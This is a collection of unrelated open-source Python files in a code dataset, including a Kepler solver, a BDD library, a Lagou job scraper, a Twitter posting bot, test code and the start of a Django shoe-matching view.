pZsyn]), color=colorsDict['syn_s1_s2'])\n ax.add_patch(triangleSyn)\n\n\n ##################################\n # Tuning\n ##################################\n\n ax.axis('off')\n ax.set_aspect('equal')\n ax.autoscale_view()\n","repo_name":"HelmchenLabSoftware/mesostat-dev","sub_path":"mesostat/visualization/metric/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":5234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4373448346","text":"import math\nimport 
scipy.special\n\ndef optimal_Newton_E0(M, e):\n \n if e >=1:\n print(\"Cannot use initial E0 function with e >= 1\")\n SystemExit\n \n if M >= 0 and M < 0.25:\n E_0 = M + e*e * (math.pow(6.*M, 1./3.) - M)\n elif M >= 0.25 and M <= math.pi:\n numer = e * math.sin(M)\n denom = 1. - math.sin(M + e) + math.sin(M)\n E_0 = M + (numer/denom)\n else:\n print(\"M out of bounds\")\n SystemExit\n \n return E_0\n\ndef Newton_Raphson(e, M, desired_accuracy):\n \n E_0 = optimal_Newton_E0(M, e)\n \n E_i = E_0\n E_j = Newton_Raphson_Iteration(E_i, e, M)\n \n while (abs(E_i - E_j) > desired_accuracy):\n E_i = E_j\n E_j = Newton_Raphson_Iteration(E_i, e, M)\n \n return E_j\n \n\ndef Newton_Raphson_Iteration(E_i, e, M):\n func_deriv_quotient_numer = E_i - e * math.sin(E_i) - M\n func_deriv_quotient_denom = 1. - e * math.cos(E_i)\n func_deriv_quotient = func_deriv_quotient_numer / func_deriv_quotient_denom\n \n E_j = E_i - func_deriv_quotient\n \n return E_j\n\n\n# get nth taylor expansion coefficient\ndef taylor_coeff_func_eccentricity(n, M):\n if n == 0:\n return M\n else:\n prefac = 1. / (math.pow(2., n -1) * math.factorial(n))\n\n running_sum = 0\n \n for k in range(0, math.floor(n/2) + 1):\n term1 = math.pow(-1., k) * scipy.special.binom(n, k)\n term2 = math.pow(n - 2.*k, n-1.) * math.sin((n - 2.*k) * M)\n running_sum += (term1 * term2)\n \n return running_sum * prefac","repo_name":"nuclth/math_explore","sub_path":"kepler_solutions.py","file_name":"kepler_solutions.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42102298899","text":"from weakref import WeakValueDictionary\n\nclass BDD:\n \"\"\"\n Binary Decision Diagram (p149).\n\n Attributes:\n idx (int): node index\n sign (bool): the node's sign\n child (list(BDD, BDD)): the node's *else* and *then* successors\n\n Note:\n Operations are carried out using the logical connectives ``~``, ``|``,\n ``&`` and ``^``.\n \"\"\"\n __unique__ = WeakValueDictionary()\n\n __id__ = lambda idx, sign, child: \\\n hash((idx, sign, id(child[0]), id(child[1]))) \\\n if child is not None else \\\n 1 if sign else 0\n\n def __hash__ (self):\n return BDD.__id__(self.idx, self.sign, self.child)\n\n def __new__ (BDD, *args):\n def new_bdd (idx, sign, child):\n node = BDD.__id__(idx, sign, child)\n if node not in BDD.__unique__:\n bdd = object.__new__(BDD)\n bdd.idx = idx\n bdd.sign = sign\n bdd.child = child\n BDD.__unique__[node] = bdd\n\n return BDD.__unique__[node]\n\n idx = args[0]\n sign = args[1] if len(args) > 1 else False\n child = \\\n None if idx < 0 \\\n else \\\n args[2] if len(args) > 2 and args[2] is not None \\\n else [ BDD.false(), BDD.true() ]\n\n if child is not None:\n if child[0] == child[1]:\n return child[0]\n\n if BDD.__id__(idx, not sign, child) not in BDD.__unique__:\n sign = child[0].sign\n if sign:\n child[0] = ~child[0]\n child[1] = ~child[1]\n\n return new_bdd(idx, sign, child)\n\n def __repr__ (self):\n if self.isConstant():\n return \"BDD({}, {})\".format(self.idx, self.sign)\n else:\n return \"BDD({}, {}, {})\".format(self.idx, self.sign, self.child)\n\n @classmethod\n def __top_idx__ (BDD, *args):\n return max(bdd.idx for bdd in args)\n\n def __cofactor__ (self, pos, idx):\n if self.isConstant():\n return self\n\n sign = self.sign\n if sign:\n self = ~self\n\n res = self.child[pos] if self.idx == idx else self\n\n return ~res if sign else res\n\n @classmethod\n def __cofactor2__ (BDD, a, b):\n idx = BDD.__top_idx__(a, b)\n\n c = [\n [ 
a.__cofactor__(0, idx), a.__cofactor__(1, idx) ],\n [ b.__cofactor__(0, idx), b.__cofactor__(1, idx) ]\n ]\n\n return (idx, c)\n\n @classmethod\n def __apply__ (BDD, op, a, b):\n if a.isConstant() and b.isConstant():\n return BDD.true() if op(bool(a), bool(b)) else BDD.false()\n\n idx, c = BDD.__cofactor2__(a, b)\n bdd = BDD(\n idx,\n False,\n [\n BDD.__apply__(op, c[0][0], c[1][0]),\n BDD.__apply__(op, c[0][1], c[1][1])\n ]\n )\n\n return bdd\n\n def __bool__ (self):\n return self.sign\n\n def __invert__ (self):\n if self.isConstant():\n return BDD.false() if self else BDD.true()\n\n return BDD(self.idx, not self.sign, self.child)\n\n def __and__ (self, other):\n return BDD.__apply__(bool.__and__, self, other)\n\n def __or__ (self, other):\n return BDD.__apply__(bool.__or__, self, other)\n\n def __xor__ (self, other):\n return BDD.__apply__(bool.__xor__, self, other)\n\n def __eq__ (self, other):\n return hash(self) == hash(other)\n\n def __neq__ (self, other):\n return not self == other\n\n __true__ = None\n\n @classmethod\n def true (BDD):\n \"\"\"Boolean constant ``True``.\"\"\"\n if BDD.__true__ is None:\n BDD.__true__ = BDD(-1, True)\n return BDD.__true__\n\n __false__ = None\n\n @classmethod\n def false (BDD):\n \"\"\"Boolean constant ``False``.\"\"\"\n if BDD.__false__ is None:\n BDD.__false__ = BDD(-1, False)\n return BDD.__false__\n\n def isConstant (self):\n \"\"\"Returns ``True`` for constant nodes.\"\"\"\n return self.idx < 0\n\n def toDot (self):\n \"\"\"\n Returns a graphical representation of the BDD (using `Graphviz\n `_).\n\n Returns:\n string: dot language representation\n \"\"\"\n declared = set()\n\n def declare (bdd, node):\n if node in declared:\n return \"\"\n\n declared.add(node)\n\n if bdd.isConstant():\n return \"\\t\\\"{}\\\" [shape=box]\\n\".format(node)\n else:\n return \"\\t\\\"{}\\\" [label=\\\"@{}\\\"{}]\\n\".format(\n node,\n bdd.idx,\n \"\" if bdd.sign else \",color=red\"\n )\n\n def bdd2dot (bdd):\n edge = \"\\t\\\"{}\\\" -- \\\"{}\\\" {}\\n\"\n node = hash(bdd)\n dot = declare(bdd, node)\n if bdd.isConstant():\n return dot\n\n for child in bdd.child:\n childNode = hash(child)\n dot += declare(child, childNode)\n dot += edge.format(\n node,\n childNode,\n \"\" if child == bdd.child[1] else \"[style=dashed,color=red]\"\n )\n dot += bdd2dot(child)\n\n return dot\n\n return \"graph BDD {\\n\" + bdd2dot(self) + \"}\\n\"\n","repo_name":"phlo/libmc","sub_path":"libmc/bdd.py","file_name":"bdd.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19252287681","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport urllib.request\nimport urllib.parse\nimport json\n\n\ndef open_url(url, page_num, keywords):\n try:\n # 设置post请求参数\n page_data = urllib.parse.urlencode([\n ('pn', page_num),\n ('kd', keywords)\n ])\n # 设置headers\n page_headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0',\n 'Connection': 'keep-alive',\n 'Host': 'www.lagou.com',\n 'Origin': 'https://www.lagou.com',\n 'Cookie': 'JSESSIONID=ABAAABAABEEAAJA8F28C00A88DC4D771796BB5C6FFA2DDA; user_trace_token=20170715131136-d58c1f22f6434e9992fc0b35819a572b; LGUID=20170715131136-13c54b92-691c-11e7-893a-525400f775ce; index_location_city=%E5%8C%97%E4%BA%AC; _gat=1; TG-TRACK-CODE=index_search; _gid=GA1.2.496231841.1500095497; _ga=GA1.2.1592435732.1500095497; 
Hm_lvt_4233e74dff0ae5bd0a3d81c6ccf756e6=1500095497; Hm_lpvt_4233e74dff0ae5bd0a3d81c6ccf756e6=1500104021; LGSID=20170715143221-5b993c04-6927-11e7-a985-5254005c3644; LGRID=20170715153341-ec8dbfd2-692f-11e7-a989-5254005c3644; SEARCH_ID=d27de6042bdf4d508cf9b39616a98a0d',\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Referer': 'https://www.lagou.com/jobs/list_%E6%95%B0%E6%8D%AE%E6%8C%96%E6%8E%98?labelWords=&fromSearch=true&suginput=',\n 'X-Anit-Forge-Token': 'None',\n 'X-Requested-With': 'XMLHttpRequest'\n }\n # 打开网页\n req = urllib.request.Request(url, headers=page_headers)\n content = urllib.request.urlopen(req, data=page_data.encode('utf-8')).read().decode('utf-8')\n return content\n except Exception as e:\n print(str(e))\n\n\n# 获取招聘职位信息\ndef get_position(url, page_num):\n try:\n page_content = open_url(url, page_num, keywords)\n data = json.loads(page_content)\n content = data.get('content')\n positionResult = content.get('positionResult').get('result')\n result = [('positionId', '职位ID'), ('positionName', '职位名称'), ('salary', '薪资'), ('createTime', '发布时间'), ('workYear', '工作经验'), ('education', '学历'),\n ('positionLables', '职位标签'), ('jobNature', '职位类型'), ('firstType', '职位大类'), ('secondType', '职位细类'), ('positionAdvantage', '职位优势'),\n ('city', '城市'), ('district', '行政区'), ('businessZones', '商圈'), ('publisherId', '发布人ID'), ('companyId', '公司ID'), ('companyFullName', '公司名'),\n ('companyShortName', '公司简称'), ('companyLabelList', '公司标签'), ('companySize', '公司规模'), ('financeStage', '融资阶段'), ('industryField', '企业领域'),\n ('industryLables', '企业标签')]\n\n if (len(positionResult) > 0):\n for position in positionResult:\n print(position)\n with open(\"lagou_position.txt\", 'a', encoding=\"utf-8\") as fh:\n fh.write(\"---------------------------\\n\")\n for r in result:\n with open(\"lagou_position.txt\", 'a', encoding=\"utf-8\") as fh:\n fh.write(str(r[1]) + \":\" + str(position.get(r[0])) + \"\\n\")\n return len(positionResult)\n except Exception as e:\n print(str(e))\n\n\n# 爬取拉勾网招聘职位信息\nif __name__ == \"__main__\":\n # 爬取起始页\n city = urllib.parse.quote(\"深圳\")\n url = 'https://www.lagou.com/jobs/positionAjax.json?city={city}&needAddtionalResult=false'.format(city=city)\n print(url)\n # 设置查询的关键词\n keywords = \"CTO\"\n page_num = 1\n while True:\n print(\"正在爬取第\" + str(page_num) + \"页......\")\n result_len = get_position(url, page_num)\n if (result_len > 0):\n page_num += 1\n else:\n break\n print(\"爬取完成\")\n","repo_name":"East196/aispider","sub_path":"custom/lagou.py","file_name":"lagou.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"70630795271","text":"# def solution(n, m, spot, plan):\n# print(spot)\n# inf = int(1e9)\n# for i in range(n):\n# for j in range(m):\n# if i == j:\n# continue\n# if spot[i][j] == 1:\n# continue\n# spot[i][j] = inf\n#\n# for k in range(n):\n# for i in range(n):\n# for j in range(n):\n# spot[i][j] = min(spot[i][j], spot[i][k] + spot[k][j])\n#\n# flag = True\n# for i in range(1, m):\n# if spot[plan[i-1] - 1][plan[i] - 1] == inf:\n# flag = False\n# break\n#\n# if flag:\n# return \"YES\"\n# else:\n# return \"NO\"\n\ndef find(x, parent):\n if parent[x] != x:\n parent[x] = find(parent[x], parent)\n return parent[x]\n\n\ndef union(a, b, parent):\n a = find(a, parent)\n b = find(b, parent)\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\n\ndef solution(n, m, spot, plan):\n parent = [0] * (n + 
1)\n for i in range(1, n + 1):\n parent[i] = i\n\n for i in range(n):\n for j in range(i, n):\n if spot[i][j] == 1:\n union(i+1, j+1, parent)\n\n flag = True\n for i in range(1, len(plan)):\n if find(plan[i], parent) != find(plan[i-1], parent):\n flag = False\n break\n\n if flag:\n return \"YES\"\n else:\n return \"NO\"\n\n\n\nprint(solution(\n 5, 4,\n [[0, 1, 0, 1, 1],\n [1, 0, 1, 1, 0],\n [0, 1, 0, 0, 0],\n [1, 1, 0, 0, 0],\n [1, 0, 0, 0, 0]],\n [2, 3, 4, 3]\n))\n\nprint(solution(\n 5, 4,\n [[0, 0, 0, 0, 0],\n [0, 0, 1, 1, 0],\n [0, 1, 0, 0, 0],\n [0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0]],\n [2, 3, 4, 3]\n))\n\nprint(solution(\n 5, 4,\n [[0, 0, 0, 0, 0],\n [0, 0, 1, 1, 0],\n [0, 1, 0, 0, 0],\n [0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0]],\n [2, 3, 4, 3, 5]\n))","repo_name":"Akgop/Problem-Solving","sub_path":"Graph(MST,TopologySort)/thisiscote_graph_q41.py","file_name":"thisiscote_graph_q41.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"3324881064","text":"\"\"\" Test suite for TokenGenerator. \"\"\"\n\nimport unittest\n\ntry:\n from unittest.mock import Mock\nexcept ImportError:\n from mock import Mock\n\nimport os\nimport sys\n\n# pylint: disable=line-too-long,wrong-import-position\nsys.path.insert(\n 0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"../src\"))\n)\nfrom token_generator import TokenGenerator\n\nimport blpapi\n\n\nclass TestTokenGenerator(unittest.TestCase):\n \"\"\"Test cases for TokenGenerator.\"\"\"\n\n def setUp(self):\n self.mock_session = Mock()\n self.mock_event_queue = Mock()\n self.token_generator = TokenGenerator(self.mock_session)\n\n def testTokenGenerationSuccess(self):\n \"\"\"Verify that on token generation success, the application receives\n a valid token.\n\n Plan:\n 1. Create a TokenStatus admin event using blpapi.test.createEvent().\n 2. Obtain the schema for TokenGenerationSuccess using\n blpapi.test.getAdminMessageDefinition().\n 3. Append a message of type TokenGenerationSuccess using\n blpapi.test.appendMessage().\n 4. 
Using the returned formatter, format the message. In this example,\n the message body contains the reason for failure.\n The reason is delivered to the user application.\n 5. Setup the event queue to return the appropriate event.\n 6. Verify that the actual token is None.\n \"\"\"\n message_content = {\n \"reason\": {\n \"source\": \"apitkns (apiauth) on n795\",\n \"category\": \"NO_AUTH\",\n \"errorCode\": 3,\n \"description\": \"App not in emrs ...\",\n \"subcategory\": \"INVALID_APP\",\n }\n }\n event = blpapi.test.createEvent(blpapi.Event.TOKEN_STATUS)\n\n token_failure = blpapi.Names.TOKEN_GENERATION_FAILURE\n schema_def = blpapi.test.getAdminMessageDefinition(token_failure)\n\n formatter = blpapi.test.appendMessage(event, schema_def)\n\n formatter.formatMessageDict(message_content)\n\n self.mock_event_queue.nextEvent.return_value = event\n\n actual_token = self.token_generator.generate(self.mock_event_queue)\n\n self.mock_session.generateToken.assert_called_once()\n self.mock_event_queue.nextEvent.assert_called_once()\n self.assertIsNone(actual_token)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n__copyright__ = \"\"\"\nCopyright 2020. Bloomberg Finance L.P.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to\ndeal in the Software without restriction, including without limitation the\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\nsell copies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions: The above\ncopyright notice and this permission notice shall be included in all copies\nor substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\n\"\"\"\n","repo_name":"msitt/blpapi-python","sub_path":"examples/unittests/market-data-notifier/tests/test_tokengenerator.py","file_name":"test_tokengenerator.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","stars":305,"dataset":"github-code","pt":"27"} +{"seq_id":"1199033066","text":"from ..sampling import *\n\n\nclass Const(Sampling):\n def __init__(self, count: int):\n self.count = count\n self.name = 'Sampling: Const (%s)' % count\n\n def get_size(self, backdoor: Backdoor):\n return self.count\n\n\n__all__ = [\n 'Const'\n]\n","repo_name":"lytr777/EvoGuess","sub_path":"algorithm/modules/sampling/impls/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6522002372","text":"# -*- coding: utf8 -*-\n\nimport os\nfrom subprocess import CalledProcessError\nfrom twister import commands, get_twister_directory\n\ndef add_arguments(parser):\n parser.add_argument(\"--dest\", help=\"destination directory, must exist; default is /usr/local/bin\", default=\"/usr/local/bin\")\n parser.add_argument(\"--name\", help=\"name for the command, usually the name of the project; default is twister\", default=\"twister\")\n\ndef get_description():\n return \"Add shortcut to the twister, that allows to run twister from any directory. By default adds shortcut to the\" \\\n \" /usr/local/bin directory, but can be added to other directory, specified by --dest argument. 
Also, the default name\" \\\n \" is 'twister', but it could and should be changed to the project name, as multiple different twister installations\" \\\n \" may be used in parallel.\"\n\ndef get_short_description():\n return \"add twister shortcut\"\n\ndef validate(validator):\n pass\n\ndef execute(context):\n try:\n twister_runner = os.path.join(get_twister_directory(), \"twister.sh\")\n commands.execute(\"ln -s %s %s\" % (twister_runner, os.path.join(context.args.dest, context.args.name)),\n output=context.args.verbose,\n error_text=\"Failed to add shortcut\")\n commands.execute(\"chmod 744 %s\" % twister_runner)\n return True\n except CalledProcessError:\n return False\n","repo_name":"rkhmelyuk/twister","sub_path":"twister/add_shortcut.py","file_name":"add_shortcut.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"41098912755","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#@Time : 2019/11/29 0029 22:05\n#@Author : tb_youth\n#@FileName: SignalSlot0.py\n#@SoftWare: PyCharm\n#@Blog : https://blog.csdn.net/tb_youth\n\nimport sys\nfrom PyQt5.QtWidgets import QApplication,QWidget,QPushButton\n\nclass SignalSlotDemo(QWidget):\n def __init__(self):\n super(SignalSlotDemo,self).__init__()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300,300,500,400)\n self.setWindowTitle('Signals and Slots')\n self.btn = QPushButton('My Button',self)\n self.btn.clicked.connect(self.onClicked)\n\n def onClicked(self):\n self.btn.setText('Signal emitted')\n self.btn.setStyleSheet(\"QPushButton{max-width:200px;min-width:200px}\")\n\n\nif __name__=='__main__':\n app = QApplication(sys.argv)\n window = SignalSlotDemo()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"tbyouth/Learn-python-notes","sub_path":"projects/demo/SignalSlot/SignalSlot0.py","file_name":"SignalSlot0.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7887161233","text":"import dataloaders.base\nfrom dataloaders.datasetGen import SplitGen, PermutedGen,RotatedGen\nfrom torch.nn.utils.convert_parameters import _check_param_device, parameters_to_vector, vector_to_parameters\nimport torch\n\n\n \ndef get_benchmark_data_loader(config):\n ## example: config.dataset_root_path='/home/usr/dataset/CIFAR100'\n config.dataset_root_path=''\n if config.dataset==\"permuted\":\n config.force_out_dim=10\n train_dataset, val_dataset = dataloaders.base.__dict__['MNIST'](config.dataset_root_path, False ,subset_size=config.subset_size)\n \n train_dataset_splits, val_dataset_splits, task_output_space = PermutedGen(train_dataset, val_dataset,config.n_tasks,remap_class= False)\n \n elif config.dataset==\"rotated\":\n config.force_out_dim=10\n import dataloaders.base\n \n Dataset = dataloaders.base.__dict__[\"MNIST\"]\n n_rotate=config.n_tasks \n \n rotate_step=5\n \n \n train_dataset_splits, val_dataset_splits, task_output_space = RotatedGen(Dataset=Dataset,\n dataroot=config.dataset_root_path,\n train_aug=False,\n n_rotate=n_rotate,\n rotate_step=rotate_step,\n remap_class=False\n ,subset_size=config.subset_size)\n \n elif config.dataset==\"split_mnist\":\n config.first_split_size=2\n config.other_split_size=2\n config.force_out_dim=0\n config.is_split=True\n import dataloaders.base\n Dataset = dataloaders.base.__dict__[\"MNIST\"]\n \n \n \n if config.subset_size<50000:\n train_dataset, val_dataset = Dataset(config.dataset_root_path,False, 
angle=0,noise=None,subset_size=config.subset_size)\n else:\n train_dataset, val_dataset = Dataset(config.dataset_root_path,False, angle=0,noise=None)\n train_dataset_splits, val_dataset_splits, task_output_space = SplitGen(train_dataset, val_dataset,\n first_split_sz=config.first_split_size,\n other_split_sz=config.other_split_size,\n rand_split=config.rand_split,\n remap_class=True)\n \n config.n_tasks = len(task_output_space.items())\n\n\n elif config.dataset==\"split_cifar\":\n config.force_out_dim=0\n config.first_split_size=5\n config.other_split_size=5\n config.is_split=True\n import dataloaders.base\n Dataset = dataloaders.base.__dict__[\"CIFAR100\"]\n # assert config.model_type == \"lenet\" # CIFAR100 is trained with lenet only\n \n train_dataset, val_dataset = Dataset(config.dataset_root_path,False, angle=0)\n \n train_dataset_splits, val_dataset_splits, task_output_space = SplitGen(train_dataset, val_dataset,\n first_split_sz=config.first_split_size,\n other_split_sz=config.other_split_size,\n rand_split=config.rand_split,\n remap_class=True)\n config.n_tasks=len(train_dataset_splits)\n \n config.out_dim = {'All': config.force_out_dim} if config.force_out_dim > 0 else task_output_space\n \n val_loaders = [torch.utils.data.DataLoader(val_dataset_splits[str(task_id)],\n batch_size=256,shuffle=False,\n num_workers=config.workers)\n for task_id in range(1, config.n_tasks + 1)]\n \n return train_dataset_splits,val_loaders,task_output_space\n\n\n\ndef test_error(trainer,task_idx):\n trainer.model.eval()\n acc = 0\n acc_cnt = 0\n with torch.no_grad():\n for idx, data in enumerate(trainer.val_loaders[task_idx]):\n \n data, target, task = data\n \n data = data.to(trainer.config.device)\n target = target.to(trainer.config.device)\n \n outputs = trainer.forward(data,task)\n \n acc += accuracy(outputs, target)\n acc_cnt += float(target.shape[0])\n return acc/acc_cnt\n \n \ndef accuracy(outputs,target):\n topk=(1,) \n with torch.no_grad():\n maxk = max(topk)\n \n _, pred = outputs.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n \n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum().item()\n res.append(correct_k)\n \n if len(res)==1:\n return res[0]\n else:\n return res\n \n \n \ndef parameters_to_grad_vector(parameters):\n # Flag for the device where the parameter is located\n param_device = None\n vec = []\n for param in parameters:\n # Ensure the parameters are located in the same device\n param_device = _check_param_device(param, param_device)\n vec.append(param.grad.view(-1))\n \n return torch.cat(vec)\n\ndef count_parameter(model):\n return sum(p.numel() for p in model.parameters())\n\n\n\ndef grad_vector_to_parameters(vec, parameters):\n # Ensure vec of type Tensor\n if not isinstance(vec, torch.Tensor):\n raise TypeError('expected torch.Tensor, but got: {}'\n .format(torch.typename(vec)))\n # Flag for the device where the parameter is located\n param_device = None\n # Pointer for slicing the vector for each parameter\n pointer = 0\n for param in parameters:\n # Ensure the parameters are located in the same device\n param_device = _check_param_device(param, param_device)\n # The length of the parameter\n num_param = param.numel()\n # Slice the vector, reshape it, and replace the old data of the parameter\n # param.data = vec[pointer:pointer + num_param].view_as(param).data\n param.grad = vec[pointer:pointer + num_param].view_as(param).clone()\n # Increment the pointer\n pointer += num_param 
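# A minimal round-trip sanity check for the flatten/unflatten helpers above.
# The toy nn.Linear model below is invented for illustration and is not part
# of the original training pipeline.
if __name__ == "__main__":
    import torch.nn as nn
    toy = nn.Linear(3, 2)
    toy(torch.randn(4, 3)).sum().backward()          # populate .grad on every parameter
    g = parameters_to_grad_vector(toy.parameters())  # flatten all grads into one vector
    grad_vector_to_parameters(g.clone(), toy.parameters())  # write the same grads back
    assert torch.equal(g, parameters_to_grad_vector(toy.parameters()))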
\n","repo_name":"tldoan/PCA-OGD","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7151,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"27"} +{"seq_id":"14935636503","text":"import sys\n\nmap = {\n ']': '[',\n '}': '{',\n ')': '(',\n '>': '<'\n}\ncost = {\n ')': 3,\n ']': 57,\n '}': 1197,\n '>': 25137\n}\nwith open(\"test.in\") as f:\n strings = f.read().splitlines()\n ans = 0\n for s in strings:\n stack = []\n for c in s:\n if c in map:\n if len(stack) == 0 or stack[-1] != map[c]:\n ans += cost[c]\n break\n stack.pop()\n else:\n stack.append(c)\n print(ans)\n","repo_name":"eldarbogdanov/advent-of-code-2021","sub_path":"python/d10p1.py","file_name":"d10p1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19530102811","text":"# Twitter api\nimport tweepy\nimport os\n\ndef main():\n # Auth vars\n consumer_key = os.getenv('twitter_consumer_key')\n consumer_secret = os.getenv('twitter_consumer_secret')\n bearer_token = os.getenv('twitter_bearer_token')\n access_token = os.getenv('twitter_access_token')\n access_token_secret = os.getenv('twitter_access_token_secret')\n\n # Authenticate\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n\n # Set text and image\n message = 'I wrote some simple code that posted this tweet. #python #tweepy'\n image = api.media_upload('image.jpg')\n\n # Post tweet with image\n api.update_status(status = message, media_ids=[image.media_id])\n\nif __name__ == \"__main__\":\n main()","repo_name":"sorenrood/twitterbot","sub_path":"tweetbot.py","file_name":"tweetbot.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"40041105222","text":"from __future__ import unicode_literals\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import viewsets, mixins, status\n#from django.conf import settings\n#from django.shortcuts import redirect\nfrom django.contrib.auth.hashers import make_password, check_password\n#from django.contrib.auth.decorators import login_required\n#from django.contrib.auth import authenticate, login, logout\n#from django.contrib.auth.models import User\nfrom skyjacs_app.models import Profile, Listing, Notification, Image, User\nfrom skyjacs_app.serializers import UserSerializer, SensitiveUserSerializer, ProfileSerializer, ListingSerializer, NotificationSerializer, ImageSerializer, MatchingSerializer\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nimport uuid\n\nSLIPON_REL = {\n\t'Slip On' : 5.0 ,\n\t'Low Top' : 4.0 ,\n\t'Skaters' : 4.0 ,\n\t'Cageless' : 3.0 ,\n\t'Runners/Joggers' : 3.0 ,\n\t'High Top' : 2.0 ,\n\t'Basketball' : 1.0,\n}\n\nLOWTOP_REL = {\n\t'Slip On' : 4.0 ,\n\t'Low Top' : 5.0 ,\n\t'Skaters' : 3.0 ,\n\t'Cageless' : 3.0 ,\n\t'Runners/Joggers' : 3.0 ,\n\t'High Top' : 1.0 ,\n\t'Basketball' : 3.0,\n}\n\nHIGHTOP_REL = {\n\t'Slip On' : 2.0 ,\n\t'Low Top' : 2.0 ,\n\t'Skaters' : 3.0 ,\n\t'Cageless' : 4.0 ,\n\t'Runners/Joggers' : 3.0 ,\n\t'High Top' : 5.0 ,\n\t'Basketball' : 4.0,\n}\n\nSKATERS_REL = {\n\t'Slip On' : 3.0 ,\n\t'Low Top' : 4.0 ,\n\t'Skaters' : 5.0 ,\n\t'Cageless' : 2.0 ,\n\t'Runners/Joggers' : 2.0 ,\n\t'High Top' : 3.0 ,\n\t'Basketball' : 
2.0,\n}\n\nRUNNERSJOGGERS_REL = {\n\t'Slip On' : 2.0 ,\n\t'Low Top' : 4.0 ,\n\t'Skaters' : 3.0 ,\n\t'Cageless' : 4.0 ,\n\t'Runners/Joggers' : 5.0 ,\n\t'High Top' : 3.0 ,\n\t'Basketball' : 4.0,\n}\n\nBASKETBAL_REL = {\n\t'Slip On' : 1.0 ,\n\t'Low Top' : 3.0 ,\n\t'Skaters' : 2.0 ,\n\t'Cageless' : 4.0 ,\n\t'Runners/Joggers' : 4.0 ,\n\t'High Top' : 3.0 ,\n\t'Basketball' : 5.0,\n}\n\nCAGELESS_REL = {\n\t'Slip On' : 3.0 ,\n\t'Low Top' : 3.0 ,\n\t'Skaters' : 1.0 ,\n\t'Cageless' : 5.0 ,\n\t'Runners/Joggers' : 3.0 ,\n\t'High Top' : 4.0 ,\n\t'Basketball' : 4.0,\n}\n\nTYPEOPTS = {\n\t'Slip On' : SLIPON_REL ,\n\t'Low Top' : LOWTOP_REL ,\n\t'Skaters' : SKATERS_REL ,\n\t'Cageless' : CAGELESS_REL ,\n\t'Runners/Joggers' : RUNNERSJOGGERS_REL ,\n\t'High Top' : HIGHTOP_REL ,\n\t'Basketball' : BASKETBAL_REL,\n}\n\nCONDITIONOPTS = {\n\t'Damaged' : 1.0,\n\t'Well-worn' : 2.0,\n\t'Good Condition' : 3.0,\n\t'New/Little use' : 4.0,\n\t'Boxed Mint' : 5.0,\n}\n\ndef matchType(pkSpec, dbSpec, strictList):\n\n\tif pkSpec == '' :\n\t\treturn -1\n\n\tif dbSpec == '' :\n\t\tdbSpecRelValue = 5.0\n\telse :\n\t\tdbSpecRelValue = TYPEOPTS[pkSpec][dbSpec]\n\n\tif 